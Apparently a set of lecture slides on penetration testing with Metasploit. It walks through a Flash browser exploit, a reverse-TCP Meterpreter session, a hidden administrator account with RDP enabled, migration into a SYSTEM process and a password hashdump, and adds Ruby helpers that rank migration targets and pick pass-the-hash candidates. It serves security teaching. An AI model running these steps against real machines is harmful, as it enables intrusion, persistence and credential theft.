Metasploit
Understand how a Pen Tester can exploit vulnerabilities and test using the Metasploit framework. Define the options and payloads required to generate and use exploits. Gaining remote access.
Prof Bill Buchanan, http://asecuritysite.com, @billatnapier
Name                                                  Disclosure Date  Rank    Description
----                                                  ---------------  ----    -----------
exploit/windows/browser/adobe_flash_pixel_bender_bof  2014-04-28       normal  Adobe Flash Player Shader Buffer Overflow
msf > info exploit/windows/browser/adobe_flash_pixel_bender_bof

       Name: Adobe Flash Player Shader Buffer Overflow
     Module: exploit/windows/browser/adobe_flash_pixel_bender_bof
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-04-28

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Retries  false            no        Allow the browser to retry the module
  SRVHOST  0.0.0.0          yes       The local host to listen on.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 2000

Description:
  This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8.

This is a browser (client-side) module: SRVHOST, SRVPORT and URIPATH define where Metasploit hosts the malicious page, and the target must be made to open it. The payload that runs on the victim (for example windows/meterpreter/reverse_tcp, with its own LHOST and LPORT) is set separately, and must fit in the 2000 bytes of space the exploit provides.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.200.0.208
LHOST => 10.200.0.208
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 10.200.0.208:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.200.0.205
[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500

exploit/multi/handler contains no exploit of its own: it only listens on LHOST:LPORT for a payload delivered by some other means. windows/meterpreter/reverse_tcp is staged, so the small stager on the target connects back, the handler sends the full Meterpreter stage (770048 bytes here), and only then does the session open. LHOST must be an address the target can actually reach.
meterpreter > sysinfo
Computer        : ENCASE-PC1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter     : x86/win32

The host is 64-bit Windows 7 SP1, but the process Meterpreter landed in is a 32-bit (WOW64) process and the Meterpreter itself is the x86 build. This matters for the process-migration step later.
meterpreter > run getgui -u newuser -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Setting user account for logon
[*] Adding User: hacker with Password: s3cr3t
[*] Hiding user from Windows Login screen
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc

meterpreter > run getgui -e

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc

The getgui script creates a hidden local administrator, puts it in the Remote Desktop Users group, enables RDP, sets the Terminal Services service to start automatically and opens the firewall port. Every run prints the path of a cleanup resource script; run it before the engagement ends, otherwise the hidden administrator account, the enabled RDP service and the firewall rule stay behind on the client's machine.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > getuid
Server username: Encase-PC1\Encase

hashdump reads the password hashes out of the SAM via LSASS and needs SYSTEM privileges. The session is running as the logged-on user Encase, so the call fails. The fix is to find a process already running as NT AUTHORITY\SYSTEM and migrate into it.
meterpreter > ps

Process List
============

PID   PPID  Name              Arch    Session     User                          Path
---   ----  ----              ----    -------     ----                          ----
0     0     [System Process]          4294967295
4     0     System            x86_64  0
264   4     smss.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
364   524   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
372   364   csrss.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
388   524   spoolsv.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
420   364   wininit.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
524   420   services.exe      x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
532   420   lsass.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
540   420   lsm.exe           x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
632   524   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
708   524   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
788   524   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
832   524   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
856   524   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
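Choosing where to migrate is a judgement call the ps listing alone does not make for you. The following Ruby script is an added example (written for this page, not part of the original slides or of Metasploit) that ranks migration targets from the ps rows shown above. The selection rule is an assumption about what a tester usually wants: a process running as NT AUTHORITY\SYSTEM in session 0, with the requested architecture, excluding the core processes whose death would take the machine or the session down, and svchost.exe instances first because they are long-lived and numerous. The sample rows are the slide's listing, split back into one process per line.

```ruby
# Added example (not from the original slides): rank migration targets from
# Meterpreter "ps" output. The selection rule is an assumption about what a
# tester usually wants: NT AUTHORITY\SYSTEM, session 0, matching architecture,
# never one of the core processes, svchost.exe preferred.

ProcRow = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

# Core processes never to migrate into: a crash inside them (or killing them
# during cleanup) takes the box or the session with it.
FRAGILE = %w[smss.exe csrss.exe wininit.exe services.exe lsass.exe lsm.exe].freeze

# Parse one "ps" row. Columns are whitespace-separated, but the user column
# can contain a space, so the path is anchored at the end and the user is
# matched lazily in between. Rows without user/path (PID 0 and 4) give nil.
def parse_ps_row(line)
  m = line.strip.match(%r{\A(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(.+?)\s+([A-Za-z]:\\\S+)\z})
  return nil unless m
  ProcRow.new(m[1].to_i, m[2].to_i, m[3], m[4], m[5].to_i, m[6], m[7])
end

# Return candidate PIDs, best first: svchost.exe instances by ascending PID,
# then any other qualifying process by ascending PID.
def migration_candidates(ps_text, arch: "x86_64")
  rows = ps_text.each_line.filter_map { |l| parse_ps_row(l) }
  ok = rows.select do |p|
    p.user == 'NT AUTHORITY\SYSTEM' && p.session.zero? &&
      p.arch == arch && !FRAGILE.include?(p.name.downcase)
  end
  svc, rest = ok.partition { |p| p.name.downcase == "svchost.exe" }
  (svc.sort_by(&:pid) + rest.sort_by(&:pid)).map(&:pid)
end

# Constructed sample: the rows from the "ps" listing on the slide.
PS_SAMPLE = <<~'PS'
  0    0    [System Process]          4294967295
  4    0    System        x86_64  0
  264  4    smss.exe      x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
  364  524  svchost.exe   x86_64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
  372  364  csrss.exe     x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
  388  524  spoolsv.exe   x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
  420  364  wininit.exe   x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
  524  420  services.exe  x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
  532  420  lsass.exe     x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
  540  420  lsm.exe       x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
  632  524  svchost.exe   x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
  708  524  svchost.exe   x86_64  0  NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
  788  524  svchost.exe   x86_64  0  NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
  832  524  svchost.exe   x86_64  0  NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
  856  524  svchost.exe   x86_64  0  NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
PS

if __FILE__ == $0
  puts "candidates: #{migration_candidates(PS_SAMPLE).join(', ')}"
end
```

On the slide's listing the ranking is 632, 832, 388: the two SYSTEM svchost.exe instances first, then spoolsv.exe, with lsass.exe and the NETWORK SERVICE / LOCAL SERVICE svchosts excluded. The 832 chosen on the next slide is the second entry. The arch filter defaults to x86_64 because that is what the slide migrated into, even though the Meterpreter itself is x86; pass arch: "x86" if you would rather stay in a 32-bit process.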
meterpreter > migrate 832
[*] Migrating from 2436 to 832...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Process 832 is an svchost.exe running as NT AUTHORITY\SYSTEM, so after migration the session has the privileges to read the SAM and hashdump succeeds. Each line is user:RID:LM hash:NT hash:::. The LM field aad3b435b51404eeaad3b435b51404ee is the hash of an empty LM password, which simply means LM hashes are not being stored; the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so Administrator (RID 500) and Guest (RID 501) have blank passwords (on a default Windows 7 install both accounts are disabled). Only the Encase account's NT hash is worth cracking or passing.
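Reading a hashdump by eye is error-prone once there are more than a handful of accounts. The script below is an added example (written for this page; it is not part of the slides or of Metasploit, though it uses Ruby, the language Metasploit is written in) that parses pwdump-format hashdump lines and flags the things a tester checks first: built-in accounts by RID, the empty-LM marker, blank passwords, and which NT hashes are actually usable for cracking or pass-the-hash. The two hash constants are the well-known empty-LM and empty-NT values; the sample is the three lines from the output above.

```ruby
# Added example (not from the original slides): triage Meterpreter hashdump
# output in pwdump format (user:rid:lm:nt:::).

# Known constants: the LM hash of an empty LM password (LM storage disabled)
# and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Well-known RIDs of the built-in local accounts.
BUILTIN_RIDS = { 500 => "built-in Administrator", 501 => "built-in Guest" }.freeze

HashEntry = Struct.new(:user, :rid, :lm, :nt)

# Parse one hashdump line into a HashEntry; nil for anything that is not a
# well-formed pwdump record (status lines, blank lines, garbage).
def parse_hashdump_line(line)
  m = line.strip.match(/\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i)
  return nil unless m
  HashEntry.new(m[1], m[2].to_i, m[3].downcase, m[4].downcase)
end

# Findings for one entry, as symbols so callers can act on them.
def assess(entry)
  findings = []
  findings << :builtin if BUILTIN_RIDS.key?(entry.rid)
  findings << :no_lm_stored if entry.lm == EMPTY_LM
  findings << :blank_password if entry.nt == EMPTY_NT
  findings << :pth_candidate unless entry.nt == EMPTY_NT
  findings
end

# Parse a whole dump and return { user => findings }.
def assess_hashdump(text)
  text.each_line.filter_map { |l| parse_hashdump_line(l) }
      .to_h { |e| [e.user, assess(e)] }
end

# NT hashes worth feeding to a cracker or a pass-the-hash tool.
def usable_nt_hashes(text)
  text.each_line.filter_map { |l| parse_hashdump_line(l) }
      .reject { |e| e.nt == EMPTY_NT }
      .to_h { |e| [e.user, e.nt] }
end

# Constructed sample: the three lines shown in the hashdump above.
SAMPLE = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DUMP

if __FILE__ == $0
  assess_hashdump(SAMPLE).each { |user, f| puts "#{user}: #{f.join(', ')}" }
end
```

Run against the slide's three lines it reports Administrator and Guest as built-in accounts with blank passwords and no LM hash stored, and Encase as the one pass-the-hash candidate. Feed it a real dump and the :builtin flag tells you which entry is the true Administrator even when the account has been renamed, since the RID does not change.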
WINEXP.EXE
Learning outcomes recap:
- Understand how a Pen Tester can exploit vulnerabilities and test using the Metasploit framework.
- Define the options and payloads required to generate and use exploits.
- Understand how to test a range of devices/instances.